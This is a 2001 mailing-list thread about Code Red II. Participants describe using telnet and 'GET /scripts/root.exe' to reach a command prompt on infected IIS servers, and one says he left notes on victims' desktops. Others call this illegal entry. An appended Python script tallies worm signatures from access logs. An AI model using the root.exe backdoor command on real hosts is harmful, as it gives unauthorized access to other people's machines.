CR worm infection attempts

Chris Cowan plug-discuss@lists.PLUG.phoenix.az.us
Thu, 9 Aug 2001 09:00:51 -0700


I thought an open door is like an open invitation... or is that just what my
high school gym teacher just said...

Chris

----- Original Message -----
From: "George Toft" <george@georgetoft.com>
To: <plug-discuss@lists.PLUG.phoenix.az.us>
Sent: Thursday, August 09, 2001 8:03 AM
Subject: Re: CR worm infection attempts


> If you are walking down the street, and see a house with the door
> open, do you walk in to see if anyone is home?  When you return, and
> see the windows broken out, and the outside spray-painted, how do you
> feel?  I think this is a similar situation - if you walk in uninvited,
> it's called "illegal entry" and you may be arrested.  Likewise, testing
> a site to see if it has been exploited is illegal as you were accessing
> their computer in an unauthorized fashion.
>
> Could you have stopped the crimes in both cases?  Maybe (if the owner
> listened to you).  Is it worth the risk to you, your reputation, and
> your family?  No.  I am not selfish - I am placing my family ahead of
> strangers, and they rely upon my income.  I suggest you do the same -
> just keep on walking, and make sure you have the safeguards of Fort
> Knox at home.
>
> George
>
>
> Derek Neighbors wrote:
> >
> > That is the problem.
> >
> > I looked at my logs out of curiosity.  I was AMAZED at the figures.  I
> > took the first IP and hit it and checked for the root.exe exploit.  Sure
> > enough it was WIDE open.
> >
> > Now I had a DILEMMA on my hands.  Do I notify this company or not?  I had
> > no malicious intent nor did I do anything.  The 'good' in me wanted to
> > notify them so that they were not 'toasted' by one with 'ill' intent.
> >
> > HOWEVER, I feared lawsuit, death and dismemberment.  So I said not a word.
> > I looked at their website about 4 hours later and they were defaced. :(
> >
> > What kind of a world is it?  I mean if I was walking down the street with
> > my fly open, I would hope to God someone would tell me.  However, I
> > suppose even in that case you should be careful.  I mean after all,
> > notifying someone that their fly was open, means you were looking at
> > their crotch.  If you were looking at their crotch you must have been
> > wanting to rape them or harass them.
> >
> > Where does the silliness stop?
> >
> > -Derek
> >
> > On Wed, 8 Aug 2001, Kim Allen wrote:
> >
> > > I've been contacting the sites that my server logs show have been
> > > hitting me with the code red signature and so far no one has bothered to
> > > respond except for one. However that site has told me how secure they are
> > > and how there is no way that they have any problems. When I sent them the
> > > portions of my server logs showing they do have a problem they threaten
> > > legal action. Has anyone else had this type of response?
> > >
> > > > To answer your question... make sure you're hitting enter TWICE after
> > > > the command.
> > > >
> > > > As a security guy myself, I'm deeply troubled by what I'm finding.
> > > > Check it out:
> > > >
> > > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > > > Trying xxx.xxx.xxx.xxx...
> > > > Connected to xxx.xxx.xxx.xxx.
> > > > Escape character is '^]'.
> > > > GET /scripts/root.exe HTTP/1.0
> > > >
> > > > HTTP/1.1 200 OK
> > > > Server: Microsoft-IIS/5.0
> > > > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > > > Content-Type: application/octet-stream
> > > > Microsoft Windows 2000 [Version 5.00.2195]
> > > > (C) Copyright 1985-1999 Microsoft Corp.
> > > >
> > > > c:\inetpub\scripts>
> > > >
> > > > From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> > > > that explains how I did it, and why they need to pay attention to
> > > > security patches. :)
> > > >
> > > > Hopefully they won't take it the 'wrong' way.
> > > >
> > > > ~g~
> > > >
> > > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > > > Wayne Conrad wrote:
> > > > > >
> > > > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > > > keep recreating the same data each time.
> > > > > >
> > > > > > Are you putting the IP's up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > > > > >     Wayne
> > > > > ________________________________________________
> > > > >
> > > > > I've been trying that out
> > > > >
> > > > > telnet ipaddress_from_my_httpd_access_log 80
> > > > >
> > > > > GET /scripts/root.exe HTTP/1.0
> > > > >
> > > > > but I can't get a command prompt - what am I missing?
> > > > >
> > > > > Craig
> > > > > ________________________________________________
> > > > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > > > > >
> > > > > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > > > >
>
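
An added example, not part of any post in this thread: the per-source tally J.Francois describes keeping for complaints, built from your own web server's access log, with the last octet masked by default in view of Wayne Conrad's concern about publishing addresses. The Common Log Format layout, the N/X padding signatures, the function names and the sample lines are assumptions made for the example.

```python
import re

# Common Log Format: host ident user [time] "METHOD path PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" \d{3}')

# Assumption: the N/X padding on /default.ida is general knowledge about Code Red
# and Code Red II, not from the thread; /scripts/root.exe is the path quoted there.
SIGNATURES = [
    ("code-red", re.compile(r'(?i:/default\.ida)\?N{20,}')),
    ("code-red-ii", re.compile(r'(?i:/default\.ida)\?X{20,}')),
    ("root.exe-probe", re.compile(r'(?i)/scripts/root\.exe')),
]

def classify(path):
    for name, rx in SIGNATURES:
        if rx.match(path):
            return name
    return None

def mask(ip):
    """Hide the last octet so a published page does not list exact hosts."""
    parts = ip.split(".")
    return ".".join(parts[:3] + ["x"]) if len(parts) == 4 else ip

def summarize(lines, redact=True):
    """Tally worm-signature hits per source from your own access log."""
    hits = {}
    for line in lines:
        m = LINE.match(line)
        kind = classify(m.group(3)) if m else None
        if kind is None:
            continue  # ordinary traffic or an unparseable line
        host, when = m.group(1), m.group(2)
        h = hits.setdefault(host, {"count": 0, "kinds": set(), "first": when})
        h["count"] += 1
        h["kinds"].add(kind)
        h["last"] = when  # log lines are chronological, so the latest wins
    rows = sorted(hits.items(), key=lambda kv: (-kv[1]["count"], kv[0]))
    return [(mask(ip) if redact else ip, h["count"], sorted(h["kinds"]),
             h["first"], h["last"]) for ip, h in rows]

# Constructed sample lines (documentation addresses, not real hosts).
SAMPLE = [
    '192.0.2.10 - - [05/Aug/2001:14:02:11 -0700] "GET /default.ida?' + "X" * 224 + ' HTTP/1.0" 404 276',
    '198.51.100.7 - - [05/Aug/2001:14:05:40 -0700] "GET /default.ida?' + "N" * 224 + ' HTTP/1.0" 404 276',
    '192.0.2.10 - - [05/Aug/2001:15:30:02 -0700] "GET /scripts/root.exe HTTP/1.0" 404 281',
    '203.0.113.5 - - [05/Aug/2001:15:31:00 -0700] "GET /index.html HTTP/1.0" 200 1043',
]
print(*summarize(SAMPLE), sep="\n")
```

Pass `redact=False` for the copy sent privately to a network's abuse contact, where the exact address and timestamps are what they need.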